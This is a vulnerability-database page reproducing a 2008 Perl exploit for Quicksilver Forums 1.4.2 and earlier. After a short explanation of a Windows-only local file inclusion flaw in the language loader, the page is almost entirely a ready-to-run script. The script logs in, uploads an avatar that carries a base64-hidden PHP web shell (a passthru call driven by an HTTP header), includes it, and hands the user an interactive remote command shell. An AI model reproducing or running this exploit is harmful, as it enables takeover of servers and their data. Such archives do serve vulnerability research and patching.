Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Quicksilver Forums <= 1.4.2 RCE Exploit (windows only)

🗓️ 25 Nov 2008 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 19 Views

Quicksilver Forums 1.4.2 RCE Exploi

Code

                                                # Author:	__GiReX__
# Homepage:	girex.altervista.org

# Date:		24/11/2008

# CMS:		Quicksilver Forums <= 1.4.2
# Site:		http://www.quicksilverforums.com/

# Bug:		Local File Inclusion
# Exploit:	Remote Command Execution

# Note:		Works with windows servers only
		Works regardless php.ini settings

# Bug Discussion:

# file: global.php
# lines: 318-329

	function get_lang($lang, $a = null, $path = './', $main = true)
	{
		if (isset($this->get['lang'])) {
			$lang = $this->get['lang'];
 
		}
 
		if (strstr($lang, '/') || !file_exists($path . 'languages/' . $lang . '.php')) {
			$lang = 'en';
		}
 
		include $path . 'languages/' . $lang . '.php';
 
# As you can see, Quicksilver filter can be easily bypassed in windows servers
# couse use of backslashes "\" in filesystem's paths.

# Thanks to the functions uset_magic_quotes_gpc() this vuln works regardless php.ini setting

# We can upload a malicious avatar and include it to have a RCE


#!/usr/bin/perl 
# Quicksilver Forums <= 1.4.2 RCE Exploit (win only)
# Local File Inclusion / Malicious Avatar Upload
# Coded by __GiReX__

use IO::Socket::INET;
use MIME::Base64;

if(@ARGV < 3)
{
    banner();
    print "[+] You need an user account to run this exploit\n\n";
    print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n";
    print "[+] Example: perl $0 localhost /quick/ test password\n";
    exit;
}

my ($host, $path, $user, $pass) = @ARGV;

$host =~ s/^http:\/\///;
$host =~ s/^www\.//; 
$target = "http://${host}${path}";

banner();	
check_vuln(); 

$cookie = do_login() or debug($debug, 1); 
upload_avatar() or debug($debug, 2);  

while(1)
{
	print "[+] shell\@quick:\$ ";
	chomp(my $cmd = <STDIN>);
	
	exit if $cmd eq 'exit';
	create_socket();
	
	print $sd  "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n".
			   "Host: $host\r\n".
			   "Cookie: $cookie\r\n".
			   "CMD: ". encode_base64($cmd)."\r\n".
			   "Connection: keep-alive\r\n\r\n";
	
	$out .= $_ while <$sd>;
	
	if($out =~ /-code-/)
	{
		$_out = substr($out, index($out, '-code-') + 6);  $n = index($_out, '-code');
		$__out = substr($_out, 0, $n);
	}
	else
	{
		debug($out, 3);
	}
	
	close($sd);
	$out = undef;
	
	print STDOUT "\n". $__out."\n";
}

sub check_vuln
{
	create_socket();
	
	print $sd   "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n".
				"Host: $host\r\n".
				"Connection: keep-alive\r\n\r\n";
				
	while(my $res = <$sd>)
	{
		$ok = 1 if $res =~ /404 Not Found/;
		
		if($res =~ /<b>Fatal error<\/b>/)
		{
			close($sd);
			return 1;
		}
		
		our $debug .= $res;
	}
	
	print STDOUT "\n[-] Server not vulnerable, maybe it's not a win server!\n" and exit
	if not defined $ok;
	
	debug($debug, 0);
}
		

sub do_login
{     
    create_socket();
	my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia";
	
	print $sd   "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" .
				"Host: $host\r\n" .
				"Connection: keep-alive\r\n" .
				"Content-Type: application/x-www-form-urlencoded\r\n" .
				"Content-Length: ". length($data)."\r\n\r\n" .
				$data . "\r\n\r\n";
    
	
	
	while(my $res = <$sd>)
	{
		if($res =~ /Set-Cookie: (\w+)_user=([0-9]+)/)
		{
		    $prefix  = $1  unless $prefix; 
		    $user_id = $2  unless $user_id;
		}
		elsif($res =~ /Set-Cookie: \w+_pass=([a-z0-9]{32})/)
		{
			my $hash_pwd = $1;  close($sd);
			print STDOUT "\n[+] Logged in with $user account\n";
			
			return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};";
		}
		
		our $debug .= $res;
	}	

	close($sd);	
	return undef;
}

sub upload_avatar
{
	create_socket();
						# Image content + post's var base64 encoded
    my $data =  "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk".
                 "NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF".
                 "0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t".
                 "LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY".
                 "XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS".
                 "0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E".
                 "aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI".
                 "g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND".
                 "gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5".
                 "hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD".
                 "b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV".
                 "JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ".
                 "hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv".
                 "ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL".
                 "S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS".
                 "1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t".
                 "LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K";
				 
	$data = decode_base64($data);

	print $sd  "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n".
			   "Host: $host\r\n" .
			   "Connection: keep-alive\r\n" .
			   "Cookie: $cookie\r\n" .
               "Content-Type: multipart/form-data; boundary=---------------------------226482744623805\r\n" .
               "Content-Length: ". length($data)."\r\n\r\n" .
			   $data . "\r\n\r\n";
		   
	
	while(my $res = <$sd>)
	{
		if($res =~ /Your avatar has been updated/)
		{
			print "[+] Malicious avatar uploaded\n\n";   close($sd);
			return 1;
		}
		
		our $debug 	.= $res;
	}
	
	close($sd);
	return undef;
}

sub create_socket
{
	our $sd = new IO::Socket::INET( 'PeerAddr' => $host,
									'PeerPort' => '80',
									'Proto'    => 'tcp',
								   ) or die $@;
}

sub debug
{
	my $output = shift;
	my $errno = shift;
	
	open(DEBUG, '>', 'debug.txt');
	print DEBUG $debug;
	
	if($errno eq '0')
	{
		print STDOUT "\n[-] Unable to request index.php! See debug.txt for more infos\n";
	}
	if($errno eq '1')
	{
		print STDOUT "\n[-] Unable to login! See debug.txt for more infos.\n";
	}
	elsif($errno eq '2')
	{
		print STDOUT "\n[-] Unable to upload avatar! See debug.txt for more infos.\n";
	}
	elsif($errno eq '3')
	{
		print STDOUT "\n[-] Exploit mistake! See debug.txt for more infos.\n";
	}
	
	close(DEBUG);
	exit;
}

sub banner
{
	print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n".
				 "[+] Local File Inclusion / Malicious Avatar Upload\n".
				 "[+] Coded by __GiReX__\n\n";
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Nov 2008 00:00Current
7.1High risk
Vulners AI Score7.1
remote command executionlocal file inclusionwindows serversphp.ini settingsmalicious avatar upload
19